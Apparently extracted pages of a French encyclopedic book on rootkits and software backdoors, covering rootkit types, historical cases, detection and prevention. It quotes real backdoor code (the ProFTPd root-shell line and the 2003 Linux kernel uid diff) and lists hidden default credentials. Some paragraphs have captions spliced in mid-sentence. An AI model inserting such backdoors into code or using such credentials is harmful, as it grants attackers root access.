Niveau de privilège Bien que le terme ait souvent désigné des outils ayant la faculté d'obtenir un niveau de privilège de type administrateur (utilisateur root) sur les systèmes Unix, un rootkit ne cherche pas obligatoirement à obtenir un tel accès sur une machine et ne nécessite pas non plus d'accès administrateur pour s'installer, fonctionner et se dissimuler[24]. Le programme malveillant « Haxdoor »[25], même s'il employait des techniques de type noyau[26] pour parfaire sa dissimulation, écoutait les communications sous Windows en mode utilisateur[27] : en interceptant les API de haut niveau, il recueillait des données confidentielles avant leur chiffrement. Cependant, l'élévation de privilège est souvent nécessaire pour que le camouflage soit efficace : le rootkit peut utiliser certains exploits afin de parfaire sa dissimulation en opérant à un niveau de privilège très élevé, pour atteindre des bibliothèques du système, des éléments du noyau, pour désactiver les défenses du système[17], etc.

Types Un rootkit peut intervenir à un ou plusieurs niveaux du système parmi les cinq suivants : micrologiciel, hyperviseur, noyau, bibliothèque ou applicatif[28].

Niveau micrologiciel/matériel Il est possible d'installer des rootkits directement au niveau du micrologiciel (ou firmware). De nombreux produits proposent désormais des mémoires flash qui peuvent être utilisées pour injecter durablement du code[29] en détournant par exemple l'usage d'un module de persistance souvent implanté dans le BIOS de certains systèmes. Un outil légitime utilise cette technique : LoJack, d'Absolute Software[10], qui permet de suivre un ordinateur à l'insu de l'utilisateur pour retrouver un ordinateur portable en cas de vol. Ce code reste en place après un formatage du Rootkit 138

disque dur, voire après un flashage du BIOS[30] si le module de persistance est présent et actif. Tout périphérique disposant d'un tel type de mémoire est donc potentiellement vulnérable. Une piste évoquée pour contrer ce genre de rootkit serait d'interdire l'écriture du BIOS, grâce à un cavalier sur la carte mère ou par l'emploi d'un mot de passe, ou d'utiliser des EFI à la place du BIOS[31], mais cette méthode reste à tester et à confirmer[32]. En novembre 2010, un chercheur français, Guillaume Delugré, publie une méthode pour remplacer le firmware d'une carte réseau très répandue sur le marché[33]. Le rootkit s'exécute ainsi directement sur la carte, et donc sans modifier l'OS. L'usage des canaux DMA permet alors de manipuler l'OS.

Niveau hyperviseur Ce type de rootkit se comporte comme un hyperviseur natif, après s'être installé et avoir modifié la séquence de démarrage, pour être lancé en tant qu'hyperviseur à l'initialisation de la machine infectée. Le système d'exploitation original devient alors un hôte (invité) du rootkit, lequel peut intercepter tout appel au matériel. Il devient quasiment impossible à détecter depuis le système original. Une étude conjointe de chercheurs de l'université du Michigan et de Microsoft a démontré la possibilité d'un tel type de rootkit, qu'ils ont baptisé « virtual-machine based rootkit » (VMBR)[34]. Ils ont pu l'installer sur un système Windows XP et sur un système Linux. Les parades proposées sont la sécurisation du boot, le démarrage à partir d'un média vérifié et contrôlé (réseau, CD-ROM, clé USB, etc.) ou l'emploi d'un moniteur de machine virtuelle sécurisé. Blue Pill est un autre exemple de rootkit utilisant cette technique. En mai 2010, Zhi Wang et Xuxian Jiang, deux chercheurs de l'Université de Caroline du Nord, publient « HyperSafe »[35], un outil permettant de sécuriser BitVisor et Xen — mais portable sur les hyperviseurs de type 1 — contre entre autres Blue Pill[36] : le principe est d'empêcher l'injection et l'exécution arbitraire de code par overflow (non-bypassable memory lockdown) et de protéger les pointeurs de fonction pour empêcher les attaques par hooking.

Niveau noyau Certains rootkits s'implantent dans les couches du noyau du système d'exploitation : soit dans le noyau lui-même, soit dans des objets exécutés avec un niveau de privilèges équivalent à celui du noyau. Sous GNU/Linux, il s'agit souvent de modules pouvant être chargés par le noyau, et sous Windows de pilotes. Avec un tel niveau de privilèges, la détection et l'éradication du rootkit n'est souvent possible que de manière externe au système en redémarrant depuis un système sain, installé sur CD, sur une clé USB ou par réseau. Le type le plus courant, depuis 1997, de rootkit noyau s'attaque au LKM des noyaux Unix. Le LKM a naturellement la possibilité de modifier certains appels système ; c'est ce qui rend le noyau modulaire. S'il est compromis par un kit, il peut remplacer la commande « ouvrir le fichier foo » – open() – par « ouvrir le fichier foo sauf s'il s'appelle rootkit », rendant les fichiers du rootkit invisibles pour l'utilisateur[37]. Adore est un de ceux-là : il remplace entre autres les appels à fork(), open() et write()[38]. A contrario, SucKIT, publié dans l'article 0x07 du Phrack no 58[39], est un rootkit noyau ne nécessitant pas de LKM[40] (il passe par le périphérique /dev/kmem). Les rootkits noyau sont dangereux à la fois parce qu'ils ont acquis des privilèges élevés (il est alors plus facile de leurrer tout logiciel de protection), mais aussi par les instabilités qu'ils peuvent causer sur le système infecté comme cela a été le cas lors de la correction de la vulnérabilité MS10-015[41], où des écrans bleus sont apparus en raison d'un conflit entre le fonctionnement du rootkit Alureon et la correction de cette vulnérabilité[42]. Rootkit 139

Niveau bibliothèque À ce niveau, le rootkit détourne l'utilisation de bibliothèques légitimes du système d'exploitation. Plusieurs techniques peuvent être utilisées. On peut patcher une bibliothèque, c'est-à-dire lui ajouter du code. On peut aussi détourner l'appel d'un objet – par hooking, (voir infra) –, ce qui revient à appeler une « autre fonction » puis à revenir à la fonction initiale, pour que le détournement soit transparent du point de vue fonctionnel. Enfin, on peut remplacer des appels système par du code malveillant. Ce type de rootkit est assez fréquent, mais il est aussi le plus facile à contrer, notamment par un contrôle d'intégrité des fichiers essentiels, en surveillant leur empreinte grâce à une fonction de hachage ; par une détection de signature du programme malveillant ; ou par exemple, par un examen des hooks au moyen d'outils comme unhide sous GNU/Linux ou HijackThis sous Windows. Un exemple connu de ce type de kit est T0rn 8 : il charge sa propre bibliothèque (libproc.a) qui va remplacer la bibliothèque standard faisant l'intermédiaire entre les informations système – /proc – et l'espace utilisateur. Ainsi, le kit peut filtrer les informations qui transitent et retirer tous ce qui pourrait révéler la présence du kit, sans toucher aux exécutables systèmes (ps, ls, etc.)[43]

Niveau applicatif Un rootkit applicatif implante des programmes malveillants de type cheval de Troie, au niveau utilisateur. Ces programmes prennent la place de programmes légitimes – usurpation d'identité – ou en modifient le comportement, afin de prendre le contrôle des ressources accessibles par ces programmes. Par exemple, une application de traitement de texte peut être remplacée par une version malicieuse et donner accès aux fonctions permettant de lire et d'écrire un fichier dans une partie de l'arborescence. Plus grave, des applications comme ls, ps, grep peuvent être remplacées[16]. Cette méthode n'est pas efficace si ces programmes sont régulièrement recompilés à partir des sources[44].

Exemples

Rootkits Sony À deux reprises, Sony a été confronté à la présence masquée de rootkits dans ses produits : dans ses clés usb biométriques[45] et dans son composant de gestion numérique des droits (DRM)[46],[47], nommé « XCP » (pour « Extended Copy Protection »), présent sur 52 CD audio (dont certains de Céline Dion et de Sarah McLachlan). L'entreprise cherchait à réduire le nombre de copies illégales de ses disques en limitant le droit de copie et en traçant la circulation des CD par internet. Le kit XCP, présent sur 4 millions de CD produits en 2005[], est parfois instable et possède lui-même des failles qui peuvent être exploitées, permettant notamment de tricher sous World of Warcraft ou de créer un virus l'utilisant[48]. En revanche, XCP peut être facilement déjoué en maquillant la deuxième piste du CD[49] : la piste n'étant plus lisible, le rootkit ne peut pas s'activer. De plus, il ne fonctionne que sur les systèmes d'exploitation de type Windows[50]. XCP se connecte régulièrement aux serveurs de Sony pour envoyer l'identifiant du disque audio que l'utilisateur écoute. Il empêche la lecture du CD par un autre logiciel que celui fourni par Sony, et limite le nombre de copies (gravure et rip) du disque[]. Une analyse du groupe Gartner montre que XCP se comporte comme un logiciel malveillant sur plusieurs points : téléchargements cachés, informations concernant son fonctionnement cachées dans la licence d'utilisation, absence d'utilitaire de désinstallation et envoi obligatoire d'un mail contenant des informations personnelles et sur le système pour en recevoir un, envoi de certaines informations à des serveurs de Sony sans information préalable à l'utilisateur[51]. Gartner met en avant le cas XCP pour montrer que ce type de DRM n'est pas à envisager par une entreprise car il est inefficace, illégal sous certains aspects et dommageable pour Rootkit 140

le client[49]. Il apparaît aussi que XCP se base sur des logiciels libres sans en respecter la licence, c'est-à-dire en redistribuant le code source produit[] : il utilise les code source de DVD Jon[]. Au final, XCP était présent sur un nombre limité de CD et son impact sur la contrefaçon n'a pas été évalué. Ces affaires ont fait un tort important à Sony, qui a fini par abandonner ces logiciels, aussi bien pour sa respectabilité que financièrement. Dans plusieurs pays, Sony a été poursuivi en justice et obligé de reprendre les CD contenant un rootkit et de dédommager les clients[52]. En 2007, aux États-Unis, Sony est condamné à rembourser jusqu'à 150 $ par acheteur pour un total de 5,75 millions de dollars[]. En 2009 en Allemagne, un travailleur indépendant a obtenu gain de cause en touchant 1 200 € de dommages et intérêts car le kit avait fait perdre du temps et des données à son entreprise[]. Pour ses rootkits, Sony a été nommé aux Big Brother Awards 2006[].

Exploitation de la vulnérabilité de LPRng Le CERTA (Centre d'Expertise Gouvernemental de Réponse et de Traitement des Attaques informatiques de l'État français) a publié, dans une note d'information, l'analyse d'une attaque ayant permis d'installer un rootkit (non identifié, mais dont les caractéristiques semblent correspondre au rootkit « Rk »[53]), n'utilisant à l'origine qu'une seule faille, laquelle concernait le module d'impression LPRng présents dans certains systèmes Linux (faille répertoriée CERTA-2000-AVI-087[54]). Cette faille, qui aurait pu être corrigée soit par la mise à jour du système, soit par le blocage d'un port spécifique grâce à un pare-feu[55], permettait l'exécution à distance de code arbitraire. Cette attaque a été menée en moins de deux minutes. L'attaquant a identifié la vulnérabilité, puis envoyé une requête spécialement formée sur le port 515 (qui était le port exposé de cette vulnérabilité) pour permettre l'exécution d'un code arbitraire à distance. Ce code, nommé « SEClpd », a permis d'ouvrir un port en écoute (tcp/3879) sur lequel le pirate est venu se connecter pour déposer une archive (nommée rk.tgz, qui contenait un rootkit) avant de la décompresser et de lancer le script d'installation. Ce script a fermé certains services, installé des chevaux de Troie, caché des processus, envoyé un fichier contenant les mots de passe du système par mail, et il a même été jusqu'à corriger la faille qui a été exploitée, afin qu'un autre pirate ne vienne pas prendre le contrôle de la machine.

Back Orifice Article détaillé : Back Orifice. Back Orifice est un rootkit client-serveur développé à partir de 1998 par le Cult of the Dead Cow, un groupe de hackers. Il permet de prendre le contrôle des ordinateurs utilisant Windows 95/98, puis NT[]. Le CDC revendique plusieurs centaines de milliers de téléchargements de la version de base « BO » et de la version améliorée « BO2K » en quelques semaines[56]. Back Orifice est certainement un des rootkits qui s'est le plus répandu, même si aujourd'hui ses cibles se sont raréfiées. L'altération de la machine cible se fait en exécutant un programme qui va se charger à chaque démarrage de la machine. Cette altération est possible car les systèmes d'exploitation Windows 95/98 n'offrent pas de mécanismes de sécurité basiques tels que le chiffrement des mots de passe stockés (ils sont stockés en clair), ou le contrôle du droit d'exécution d'un programme (tout le monde peut exécuter n'importe quelle application, et même reconfigurer le système). Le client, utilisable sous Windows et Unix, est graphique et permet même à un non-initié de contrôler une machine infectée[]. La désinstallation du kit est simple : il suffit de supprimer l'exécutable résident et de retirer une clé de la base de registre. La plupart des antivirus le reconnaissent comme un virus. Rootkit 141

TDL-4 TDL-4 est un trojan, qui installe un rootkit pour construire un botnet. Le rootkit s'installe sur le MBR du disque dur ce qui le rend difficile à détecter et à déloger. De plus, il utilise un système de cryptage complexe et un réseau pair-à-pair public (Kad) pour recevoir ses commandes. Il a la particularité de pouvoir désactiver les infections présentes sur la même machine pour ne pas être découvert par inadvertance, et d'installer ses propres outils de DDoS, de spamming... Selon Kaspersky, il y aurait 4.5 millions de machines infectées (fin juin 2011)[57].

Prévention

Moyens de détection La mise en œuvre d'une détection peut, selon le type de rootkit, demander un examen du système ou d'un périphérique suspect en mode « inactif » (démarrage à partir d'un système de secours ou d'un système réputé sain). Plusieurs méthodes existent. La recherche d'objets cachés (tels que des processus informatiques, des clés de registre, des fichiers, etc.) est essentielle. Des outils comme unhide sous Linux peuvent révéler les processus cachés. Sous Windows, des outils comme RootkitRevealer recherchent les fichiers cachés en listant les fichiers via l'API normale de Windows puis en comparant cette liste à une lecture physique du disque ; les différences entre les deux sont alors repérées comme suspectes, à l'exception des fichiers légitimes connus de Windows, tels que les fichiers de métadonnées de NTFS comme $MFT ou $Secure[58]. Le contrôle de l'intégrité des fichiers consiste à calculer, pour chaque fichier sensible (bibliothèque, commande système, etc.), une empreinte[19]. Toute modification inattendue de cette empreinte indique une modification du fichier, et donc une contamination potentielle. Cependant, tout système subit des modifications légitimes lors des mises à jour ; idéalement, l'outil de contrôle a la possibilité d'accéder à une base de référence de ces sommes de contrôles, selon la Le calcul régulier des empreintes de fichiers version du système utilisée (rkhunter par exemple). sensibles permet de détecter une modification inattendue. La détection de signatures spécifiques est le procédé classique d'analyse de signature, comme cela se fait pour les virus : on cherche à retrouver dans le système la trace d'une infection, soit directement (signature des objets du rootkit), soit par le vecteur d'infection (virus utilisé par le rootkit)[19]. L’analyse des appels systèmes, des tables d'interruption[59],[60], et de manière générale, des tables de travail utilisées par le système, au moyen d'outils spécifiques (des logiciels anti-espion comme HijackThis), permet de voir si ces appels ont été détournés ou non, par exemple en comparant ce qui est chargé en mémoire avec les données brutes de bas niveau (ce qui est écrit sur le disque). Rootkit 142

On peut aussi s'intéresser à la charge du système. Du point de vue du processeur et de l'activité applicative, une surveillance continue peut mettre en évidence une surcharge, à partir du moment de la contamination. Il s'agit essentiellement d'une analyse de la charge habituelle de la machine, comme le nombre de mails sortants ou l'occupation du processeur. Toute modification (en surcharge) sans cause apparente est suspecte, mais elle nécessite une analyse complémentaire pour écarter les causes légitimes (mise à jour du système, installation de logiciels, etc.) [61] Le hooking consiste à détourner un appel de De la même manière, l’analyse des flux réseau permet de détecter fonction légitime par un autre qui contient du une surcharge anormale. Mais il convient également de surveiller une code malveillant. utilisation de ports logiciels inhabituels grâce aux traces issues d'un pare-feu ou grâce à un outil spécialisé. Il est également possible de faire une recherche des ports ouverts et cachés, en comparant ce que connaît le système avec ce qui est effectivement ouvert, grâce à des outils d'investigation comme unhide-tcp. Toute différence peut être considérée comme anormale. Il existe cependant des moyens de dissimulation réseau, comme de la stéganographie ou l'utilisation de canaux cachés, qui rend la détection directe impossible, et nécessite une analyse statistique qui n'est pas forcément déterminante[62].

L’analyse automatisée des logs système[63] s'appuie sur le principe de corrélation, avec des outils de type HIDS qui disposent de règles paramétrables[64] pour repérer les événements anormaux et mettre en relation des événements systèmes distincts, sans rapport apparent ou épars dans le temps. Le site du Cert-IST propose régulièrement des informations sur les rootkits et les logiciels malicieux en général[65].

Moyens de protection et de prévention Les moyens de détection peuvent également servir à la prévention, même si celle-ci sera toujours postérieure à la contamination. D'autres mesures en amont peuvent rendre difficile l'installation d'un rootkit[66]. La correction des failles par mise à jour du système d'exploitation permet de réduire la surface d'exposition du système en limitant le temps pendant lequel une faille est présente sur le système[67] et dans les applications[63], afin de prévenir les exploits pouvant être utilisés pour la contamination. L’utilisation d'un pare-feu, qui fait partie des bonnes pratiques dans le domaine de la sécurité informatique, se révèle efficace dans le cas des rootkits[60],[63],[67] car cela empêche les communications inattendues (téléchargements de logiciel, dialogue avec un centre de contrôle et de commande d'un botnet, etc.) dont ont besoin les rootkits. Il est possible de désactiver le système de chargement de modules en rendant le noyau statique, ce qui protège contre les rootkits qui s'installent en chargeant un module ; certains rootkits arrivent cependant à contourner cela en reconnaissant l'empreinte du module directement dans la mémoire[37]. De même, pour renforcer la robustesse des bibliothèques et empêcher le hooking, il est possible de compiler statiquement les bibliothèques[43]. Rootkit 143

Des systèmes de prévention d'intrusion[63], sous forme de logiciel ou de matériel, répondent dès qu'une intrusion est détectée, en bloquant des ports ou en interdisant la communication avec une source (adresse IP) douteuse, ou toute autre action appropriée. La détection sera d'autant meilleure que l'outil utilisé sera externe au système examiné, puisque certains rootkits peuvent atteindre des parties de très bas niveau dans le système, jusqu'au BIOS. Un des avantages de ces outils est l'automatisation des tâches de surveillance[19].

Des outils spécialisés de contrôle d'intégrité des fichiers peuvent La complexité d'un mot de passe est produire des alertes lors de modifications inattendues. Cependant, ce proportionnelle à sa taille et au nombre de contrôle à lui seul est insuffisant si d'autres mesures préventives ne caractères différents qu'il utilise. Un mot de passe complexe sera plus long à deviner dans une sont pas mises en œuvre, si aucune réponse du système n'est attaque par force brute. déclenchée ou si ces différences ne sont pas analysées. Le renforcement de la robustesse des mots de passe est une autre des bonnes pratiques de sécurité informatique qui élimine une des sources principales de contamination. Des éléments d'authentification triviaux sont des portes ouvertes pour tout type d'attaque informatique. Le démarrage du système à partir d'une image saine, contrôlée et réputée valide du système d'exploitation, via un support fixe (comme un LiveCD, une clé USB) ou par réseau, permet de s'assurer que les éléments logiciels principaux du système ne sont pas compromis, puisqu'à chaque redémarrage de la machine concernée, une version valide de ces objets est chargée. Un système corrompu serait donc remis en état au redémarrage (sauf dans le cas de rootkit ayant infecté un plus bas niveau, comme le BIOS). Les moyens de protection habituels sont également valables contre les rootkits : « Do everything so that attacker doesn’t get into your system »[62]. Durcissement du système[60], filtrages applicatifs (type modsecurity), utilisation de programmes antivirus[60],[67] pour minimiser la surface d'attaque et surveiller en permanence les anomalies et tentatives de contamination, sont bien sûr à mettre en œuvre pour éviter la contamination du système et l'exposition aux exploits.

Outils et logiciels de détection À part quelques cas particuliers, l'industrie de la sécurité informatique a tardé à prendre en compte les rootkits, les virus puis les chevaux de Troie accaparant l'attention des éditeurs. Il existe cependant quelques logiciels de détection et de prévention spécifiques à Windows, tels que Sophos Anti-Rootkit ou AVG Anti-Rootkit. Sous Linux, on peut citer rkhunter et chkrootkit ; plusieurs projets open-source existent sur Freshmeat et Sourceforge.net. Aujourd'hui, il reste difficile de trouver des outils spécifiques de lutte contre les rootkits, mais leur détection et leur prévention sont de plus en plus intégrées dans les systèmes de prévention d'intrusion et même dans les antivirus classiques, lesquels sont de plus en plus obligés de se transformer en suites de sécurité pour faire face à la diversité des menaces ; ils proposent en effet de plus en plus souvent des protections contre les rootkits. C'est le cas d'Avast[68] , AVG 8.0[69] ou encore Microsoft Security Essentials[70]. Rootkit 144

Bibliographie : ouvrage ou article utilisé comme source pour la rédaction de cet article • Greg Hoglund et James Butler (trad. Freenet Sofor ltd.), Rootkits : infiltrations du noyau Windows [« Rootkits: re Subverting the Windows »], Paris, Campus Press, 2006 (1 éd. 2005), 338 p. (ISBN 9782744020766) (OCLC 145848531 [71] ) • (en) Larry Stevenson et Nancy Altholz, Rootkits for dummies, Indianapolis, Ind, Wiley Pub., coll. « For [72] [73] dummies », 2007, 380 p. (ISBN 9780471917106) (OCLC 85824660 ) [ lire en ligne (page consultée le 19 avril 2010)] • (en) Ric Vieler, Professional rootkits, Indianapolis, IN, Wiley/Wrox, coll. « Wrox professional guides », 2007, [74] [75] 334 p. (ISBN 9780470101544) (OCLC 77116927 ) [ présentation en ligne ] • (en) Bill Blunden, The rootkit arsenal : escape and evasion in the dark corners of the system, Plano, Tex, [76] Wordware Pub., juin 2009, 908 p. (ISBN 9781598220612) (OCLC 297145864 ) • Joseph Kong, Rootkits BSD - Mieux les comprendre pour mieux s'en protéger, CampusPress, coll. « Sécurité Informatique », 14 novembre 2007, 148 p. (ISBN 978-2744022203) • (en) Anton Chuvakin, « An Overview of Unix Rootkits », iALERT White Paper, Chantilly, VA, iDefense Labs, [77] février 2003, p. 27 [ texte intégral [PDF] (page consultée le 30 mars 2010)] • [PDF] E. Lacombe, F. Raynal, V. Nicomette, « De l’invisibilité des rootkits : application sous Linux » [78], CNRS-LAAS/Sogeti ESEC, juin 2007. Consulté le 24 avril 2010

Notes et références • Source Chuvakin : [3] Chuvakin (2003), 3 : Executive Summary [4] Lacombe (2007), Définition d’un rootkit et comparaison avec les autres codes malicieux, 8 [5] Lacombe (2007), Vers l’évaluation d’un rootkit, 14 [6][6]Un rootkit falsifie le noyau du système d'exploitation, mais il n'est pas un vecteur de diffusion. Voir à ce sujet la section Mode opératoire. [12] Chuvakin (2003), 25 : End Notes [13] Lacombe (2007), L’architecture fonctionnelle d’un rootkit, 9 [15] Chuvakin (2003), 8-9 : Concealing Evidence [16] Chuvakin (2003), 10-12 : Binary Rootkits [17][17]Lacombe (2007) [18] Chuvakin (2003), 7-8 : Attack Other Systems [20][20]Lacombe (2007), La communication avec le rootkit, 11 [21] Chuvakin (2003), 4-7 : Maintain Access [28] Chuvakin (2003), 10 : Types of Rootkits [35] Zhi Wang, Xuxian Jiang, HyperSafe: A Lightweight Approach to Provide Lifetime Hypervisor Control-Flow Integrity, 31 conférence IEEE Symposium on Security and Privacy, Oakland, CA, mai 2010 [37] Chuvakin (2003), 12-13 : Kernel Rootkits [43] Chuvakin (2003), 13-14 : Library Kits [44][44]Lacombe (2007), Évolution des rootkits, 4 [53] Chuvakin (2003), 22 : Rk: Hidden but Not Enough

[71] http:/ / worldcat. org/ oclc/ 145848531& lang=fr

[72] http:/ / worldcat. org/ oclc/ 85824660& lang=fr

[73] http:/ / books. google. com/ books?id=MTcep7V6heUC

[74] http:/ / worldcat. org/ oclc/ 77116927& lang=fr

[75] http:/ / books. google. com/ books?id=OSaVF_jzsJgC

[76] http:/ / worldcat. org/ oclc/ 297145864& lang=fr

[77] http:/ / www. thehackademy. net/ madchat/ vxdevl/ avtech/ An%20Overview%20of%20Unix%20Rootkits. pdf

[78] http:/ / www. security-labs. org/ fred/ docs/ sstic07-rk-article. pdf • Source Lacombe : •• Autres sources Porte dérobée 145 Porte dérobée

Dans un logiciel, une porte dérobée (de l'anglais backdoor, littéralement porte de derrière) est une fonctionnalité inconnue de l'utilisateur légitime, qui donne un accès secret au logiciel. L'introduction d'une porte dérobée dans un logiciel à l'insu de son utilisateur transforme le logiciel en cheval de Troie.

Technique Une porte dérobée peut être introduite soit par le développeur du logiciel, soit par un tiers. La personne connaissant la porte dérobée peut l'utiliser pour surveiller les activités du logiciel, voire en prendre le contrôle (par contournement de l'authentification). Enfin, selon l'étendue des droits que le système d'exploitation donne au logiciel contenant la porte dérobée, le contrôle peut s'étendre à l'ensemble des opérations de l'ordinateur. La généralisation de la mise en réseau des ordinateurs rend les portes dérobées nettement plus utiles que du temps où un accès physique à l'ordinateur était la règle. Parmi les motivations amenant les développeurs de logiciel à créer des portes dérobées, il y a : • l'intérêt pratique d'un accès facile et toujours ouvert au logiciel pour pouvoir mener efficacement les actions de maintenance ; •• la possibilité de désactiver subrepticement le logiciel en cas de désaccord avec son client (non-paiement de licence). Parmi les motivations amenant les pirates informatiques à installer une porte dérobée : • la possibilité de surveiller ce que fait l'utilisateur légitime et de copier ou détruire des données ayant une valeur (mots de passe, clé privée pour déchiffrer des messages privés, coordonnées bancaires, secrets commerciaux) ; • la possibilité de prendre le contrôle d'un ordinateur et de pouvoir l'utiliser pour mener des actions malfaisantes (envoi de pourriels notamment pour le hameçonnage, de virus informatiques, déni de service) ; • le contrôle d'un vaste réseau d'ordinateurs (voir botnet), qui peut être utilisé pour du chantage au déni de service distribué (DDoS), ou revendu à des criminels. Pour installer des portes dérobées en masse, les pirates utilisent des vers. Ceux-ci se répandent automatiquement et installent un serveur informatique sur chaque ordinateur infecté. Ensuite le pirate peut se connecter à travers Internet au serveur. Une porte dérobée peut aussi être insérée par voie d'Easter egg, de compilateur (voir la section plus bas Le cas du compilateur C Unix: Trusting Trust), ou peut prendre la forme d'un programme, comme Back Orifice.

Le cas du compilateur C Unix : Trusting Trust En 1984, l'informaticien américain Kenneth Thompson décrit, dans son article Reflections on Trusting Trust, comment il aurait été possible d'insérer une porte dérobée dans tous les programmes en C compilés sur Unix. De plus, vu que les versions mises à jour de ce compilateur, qui n'est rien d'autre qu'un autre programme compilé, sont compilées à partir du compilateur C préexistant, l'algorithme d'insertion de la porte dérobée se serait fait transmettre d'une mise à jour à une autre. Donc, si ce compilateur à porte dérobée avait été « lâché dans la nature » (en anglais : released in the wild) à l'origine, alors n'importe quel compilateur de C insérerait possiblement des portes dérobées de nos jours. Il est à noter que la porte dérobée présente dans tous les programmes C compilés n'apparaîtrait jamais dans le code source en C. L'appellation trust (pour confiance) vient du fait que le compilateur C d'origine est considéré par son utilisateur final comme une boîte noire digne de confiance. Porte dérobée 146

Pour un programmeur qui ne comprend pas le fonctionnement d'un tel compilateur, mais lui fait confiance, il serait difficile de penser qu'un programme, qu'il a lui-même écrit puis compilé, contient une porte dérobée[1].

Affaires notables

F5 Big-IP et Enterprise Manager (2012) Le 16 février 2012, une clef secrète permettant de s'authentifier en tant que root (Administrateur) sur la majorité des appareils vendus par F5 a été révélée [2]. La faille a été corrigée par le vendeur le 06 juin 2012[3]. Cette clef étant présente sur tous les appareils vulnerables, le bug a obtenu un Pwnie Award (en) [4] durant la conférence BlackHat USA 2012.

HP StorageWorks P2000 G3 (2010) Le 13 décembre 2010, un compte caché a été trouvé[5],[6],[7] dans le système de stockage HP StorageWorks P2000 G3 : le nom d'utilisateur « admin » et le mot de passe « !admin » permet de s'identifier avec le maximum de privilèges. Il n'est pas possible de supprimer ce compte, par contre il est possible d'en changer le mot passe en passant par la ligne de commande[8] (commande « set password admin password ... »).

ProFTPd (2010) Le 28 novembre 2010, le tarball de la dernière version (1.3.3c) du serveur FTP ProFTPd a été remplacé par une version contenant une porte dérobée sur le serveur FTP officiel du projet[9]. La porte dérobée ajoute une commande « HELP ACIDBITCHEZ » qui ouvre un shell en tant que l'utilisateur root[10]. Le tarball a été propagé sur l'ensemble des miroirs officiels. La compromission a été découverte[11] le 1er décembre 2010, et corrigée le 2 décembre. La porte dérobée a notamment ajouté la ligne suivante au fichier src/help.c :

if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

L'attaquant s'est introduit sur le serveur FTP en utilisant une faille du module SQL de PostgreSQL qui permet d'exécuter du code à distance. Cette faille a été publiée[12] le 17 novembre 2010 dans le numéro 67 du magazine Phrack. La faille est corrigée[13] par la version 1.3.3d de ProFTPd.

Cisco Unified Videoconferencing (2010) Trois comptes ont été découverts dans un système de visioconférence Cisco, Cisco Unified Videoconferencing (UVC), modèles System 5110 et 5115, utilisant le système d'exploitation Linux. C'est Florent Daigniere qui a découvert ces comptes durant un audit et il les a diffusés sur la liste de diffusion Full Disclosure le 17 novembre 2010[14],[15]. Cisco a publié un bulletin de sécurité le même jour[16]. Il s'agit des comptes « root », « cs » et « develop » qui ne peuvent ni être modifiés, ni être supprimés. Ils permettent un accès distant par les protocoles FTP et SSH. D'autres failles ont été découvertes durant cet audit. Porte dérobée 147

Noyau Linux (2003) Le 4 novembre 2003, une porte dérobée a été introduite[17] dans le noyau Linux directement sur le serveur CVS par un attaquant se faisant passer pour David S. Miller (développeur noyau). Elle a été détectée dès le lendemain[18]. Le serveur CVS était un miroir du dépôt officiel utilisant BitKeeper[19]. La porte dérobée a été greffée très synthétiquement, elle consiste en deux lignes de langage C, ajoutées à la fonction sys_wait4 du fichier « kernel/exit.c » :

+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) + retval = -EINVAL;

La condition (current->uid = 0) est censée être lue par un lecteur particulièrement naïf comme une comparaison « si le numéro d'utilisateur du processus est 0 (root) » mais signifie en réalité en langage C l'affectation « le numéro d'utilisateur du processus devient 0 (root) ». Le résultat est que si cette fonction sys_wait4() truquée était appelée avec les paramètres __WCLONE|__WALL, le processus prenait l'identité de root, le niveau d'utilisateur disposant des droits d'accès maximaux. Cette modification visait à profiter de la confusion entre divers langages de programmation, où le symbole de la comparaison de deux valeurs est le signe = (Pascal, Ada, ML...) et d'autres où c'est la double égalité == qui joue ce rôle (C, C++, Java...), le signe = signifiant alors une affectation d'une valeur à une variable. Cette modification avait peu de chance de passer inaperçue, car ce type d'erreur est peu compatible avec le niveau en informatique de programmeurs travaillant sur le noyau Linux. Le langage C étant le langage de programmation le plus utilisé sur les systèmes de la famille Unix, très peu d'utilisateurs non débutants se seraient laissés prendre. De plus, le processus de développement collectif d'un logiciel (notamment celui d'un logiciel libre) impose que chaque modification soit validée ; elle doit pour cela avoir une justification légitime. Ainsi, toute modification, aussi minime soit-elle, apparait dans les diff et soulève de légitimes interrogations si elle n'a pas une justification claire.

Microsoft Windows NT4 et _NSAKEY (1999) Article détaillé : _NSAKEY. _NSAKEY est le nom d'une variable découverte en août 1999 dans le système d'exploitation Windows NT 4 (SP5) de Microsoft. Cette version fut diffusée sans que les informations destinées au débugage soient enlevées. La variable découverte par Andrew D. Fernandes de Cryptonym Corporation contenait une clé publique de 1024 bits. La nouvelle provoqua un tollé général et l'apparition de diverses rumeurs concernant une éventuelle conspiration gouvernementale. Si la NSA avait effectivement été en possession de la clé secrète correspondant à la clé présente dans Windows NT, il lui aurait été possible de chiffrer des données provenant des utilisateurs et, avec la complicité de Microsoft, de récupérer ces informations.

Interbase (1994-2001) Une porte dérobée a été découverte dans le système de gestion de base de données Interbase le 10 janvier 2001[20], lors de l'ouverture du code source par son éditeur, Borland. Il suffisait d'entrer le nom d'utilisateur « politically » et le mot de passe « correct » pour se connecter en administrateur. Cette porte dérobée a été introduite entre 1992 et 1994[21]. Ce compte ne pouvant pas être modifié ou supprimé, il fallait par conséquent installer une nouvelle version d'Interbase ne contenant pas ce compte caché. Porte dérobée 148

BIOS Des BIOS de certains fabricants[22] (dont les deux principaux, AMI et AWARD) ont un mot de passe caché permettant d'accéder au BIOS même s'il est protégé par un mot de passe choisi par l'utilisateur. Le mot de passe caché dépend du modèle de BIOS.

Failles de sécurité introduites involontairement Dans les affaires suivantes, une modification d'un logiciel a introduit une faille de sécurité, sans que l'auteur de la modification ne l'ait fait volontairement. L'auteur n'avait pas les compétences pour évaluer que sa modification puisse introduire une faille de sécurité, ou plus simplement il n'a pas pensé à l'impact qu'elle pouvait avoir sur la sécurité du produit.

